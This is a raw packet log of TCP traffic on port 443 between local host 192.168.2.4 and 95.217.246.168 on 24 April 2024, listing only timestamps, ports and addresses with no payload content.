Apr 24, 2024 16:48:59.490438938 CEST	49752	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:59.490447998 CEST	443	49752	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:59.492782116 CEST	49752	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:59.492791891 CEST	443	49752	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:59.492841005 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:59.492928982 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:59.492938995 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:59.493006945 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:59.493962049 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:59.493987083 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:59.917726994 CEST	49753	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:59.917761087 CEST	443	49753	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:59.917850971 CEST	49753	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:59.918067932 CEST	49753	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:59.918081045 CEST	443	49753	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:00.675319910 CEST	443	49752	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:00.675390005 CEST	49752	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:00.675395012 CEST	443	49752	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:00.675441980 CEST	49752	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:00.676310062 CEST	49752	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:00.676321983 CEST	443	49752	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:00.940932989 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:00.940965891 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:00.941039085 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:00.941260099 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:00.941272020 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:01.465972900 CEST	443	49753	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:01.466063023 CEST	49753	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:01.466454983 CEST	49753	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:01.466463089 CEST	443	49753	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:01.468430042 CEST	49753	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:01.468439102 CEST	443	49753	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:01.596283913 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:01.596472025 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:01.596950054 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:01.596959114 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:01.598949909 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:01.598956108 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:02.622908115 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:02.622941017 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:02.622956991 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:02.623029947 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:02.623068094 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:02.623080015 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:02.623136044 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:02.658708096 CEST	443	49753	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:02.658791065 CEST	49753	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:02.658808947 CEST	443	49753	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:02.658855915 CEST	49753	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:02.658875942 CEST	443	49753	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:02.658929110 CEST	49753	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:02.659626007 CEST	49753	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:02.659636974 CEST	443	49753	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:02.771241903 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:02.771275043 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:02.771384001 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:02.771403074 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:02.771431923 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:02.771461964 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:02.995132923 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:02.995163918 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:02.995392084 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:02.995410919 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:02.995466948 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:03.143009901 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:03.143040895 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:03.143354893 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:03.143377066 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:03.143431902 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:03.253576040 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:03.253603935 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:03.253649950 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:03.253681898 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:03.253695011 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:03.253719091 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:03.328843117 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:03.328872919 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:03.328917980 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:03.328933001 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:03.329086065 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:03.329086065 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:03.391282082 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:03.391302109 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:03.391371012 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:03.391386986 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:03.391429901 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:03.473877907 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:03.473905087 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:03.474059105 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:03.474086046 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:03.474133968 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:03.527903080 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:03.527923107 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:03.528124094 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:03.528151035 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:03.528197050 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:03.587003946 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:03.587027073 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:03.587157965 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:03.587181091 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:03.587327003 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:03.634179115 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:03.634207964 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:03.634414911 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:03.634428978 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:03.634495974 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:03.674180984 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:03.674204111 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:03.674304008 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:03.674316883 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:03.674361944 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:03.713057995 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:03.713078976 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:03.713259935 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:03.713270903 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:03.713316917 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:03.747539997 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:03.747562885 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:03.747766972 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:03.747776985 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:03.747831106 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:03.775114059 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:03.775139093 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:03.775228024 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:03.775238037 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:03.775284052 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:03.808001041 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:03.808026075 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:03.808211088 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:03.808221102 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:03.808279991 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:03.830035925 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:03.830106974 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:03.830112934 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:03.830137014 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:03.830168009 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:03.830183029 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:03.858500004 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:03.858527899 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:03.858563900 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:03.858575106 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:03.858592033 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:03.858632088 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:03.882088900 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:03.882133007 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:03.882177114 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:03.882184029 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:03.882196903 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:03.882227898 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:03.920015097 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:03.920049906 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:03.920094967 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:03.920114994 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:03.920125961 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:03.920156002 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:03.930716038 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:03.930749893 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:03.930810928 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:03.930816889 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:03.930841923 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:03.930860043 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:03.952080965 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:03.952147961 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:03.952178001 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:03.952192068 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:03.952219009 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:03.952239990 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:03.993665934 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:03.993700027 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:03.993748903 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:03.993756056 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:03.993788958 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:03.993807077 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:03.996737003 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:03.996756077 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:03.996809959 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:03.996818066 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:03.996865988 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:04.015461922 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:04.015500069 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:04.015573978 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:04.015582085 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:04.015592098 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:04.015624046 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:04.036236048 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:04.036256075 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:04.036340952 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:04.036349058 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:04.036392927 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:04.054795980 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:04.054810047 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:04.054900885 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:04.054909945 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:04.054965019 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:04.071527004 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:04.071542025 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:04.071629047 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:04.071635962 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:04.071682930 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:04.087524891 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:04.087546110 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:04.087605953 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:04.087615013 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:04.087656975 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:04.111534119 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:04.111552000 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:04.111622095 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:04.111630917 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:04.111673117 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:04.121432066 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:04.121448994 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:04.121510029 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:04.121516943 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:04.121563911 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:04.135921001 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:04.135937929 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:04.136006117 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:04.136013031 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:04.136054993 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:04.151565075 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:04.151633978 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:04.151647091 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:04.151667118 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:04.151694059 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:04.151715040 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:04.165663004 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:04.165709019 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:04.165767908 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:04.165776014 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:04.165807009 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:04.165827036 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:04.178469896 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:04.178518057 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:04.178606033 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:04.178613901 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:04.178657055 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:04.190532923 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:04.190581083 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:04.190618038 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:04.190625906 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:04.190645933 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:04.190665960 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:04.212992907 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:04.213041067 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:04.213119030 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:04.213119030 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:04.213126898 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:04.213165998 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:04.215477943 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:04.215521097 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:04.215580940 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:04.215588093 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:04.215598106 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:04.215629101 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:04.227510929 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:04.227555990 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:04.227598906 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:04.227607012 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:04.227632046 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:04.227649927 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:04.239954948 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:04.240003109 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:04.240036964 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:04.240046024 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:04.240066051 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:04.240082979 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:04.253427029 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:04.253473043 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:04.253530979 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:04.253540039 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:04.253567934 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:04.253588915 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:04.259093046 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:04.259146929 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:04.259192944 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:04.259197950 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:04.259221077 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:04.259243965 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:04.259296894 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:04.259355068 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:04.270734072 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:04.270747900 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:04.543669939 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:04.543713093 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:04.543771982 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:04.543997049 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:04.544012070 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:05.202562094 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:05.202635050 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:05.877515078 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:05.877535105 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:05.877681017 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:05.877686024 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:06.535721064 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:06.535789967 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:06.535801888 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:06.535820007 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:06.535851955 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:06.535880089 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:06.535887957 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:06.535911083 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:06.535940886 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:06.535963058 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:06.685362101 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:06.685434103 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:06.685509920 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:06.685522079 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:06.685556889 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:06.685570955 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:06.911881924 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:06.911910057 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:06.911957026 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:06.912007093 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:06.912029028 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:06.912044048 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:06.912066936 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:07.052412987 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:07.052498102 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:07.052555084 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:07.052609921 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:07.052644968 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:07.052669048 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:07.172094107 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:07.172164917 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:07.172336102 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:07.172336102 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:07.172363997 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:07.172408104 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:07.249567986 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:07.249624014 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:07.249721050 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:07.249739885 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:07.249787092 CEST	49755	443	192.168.2.4	95.217.246.168
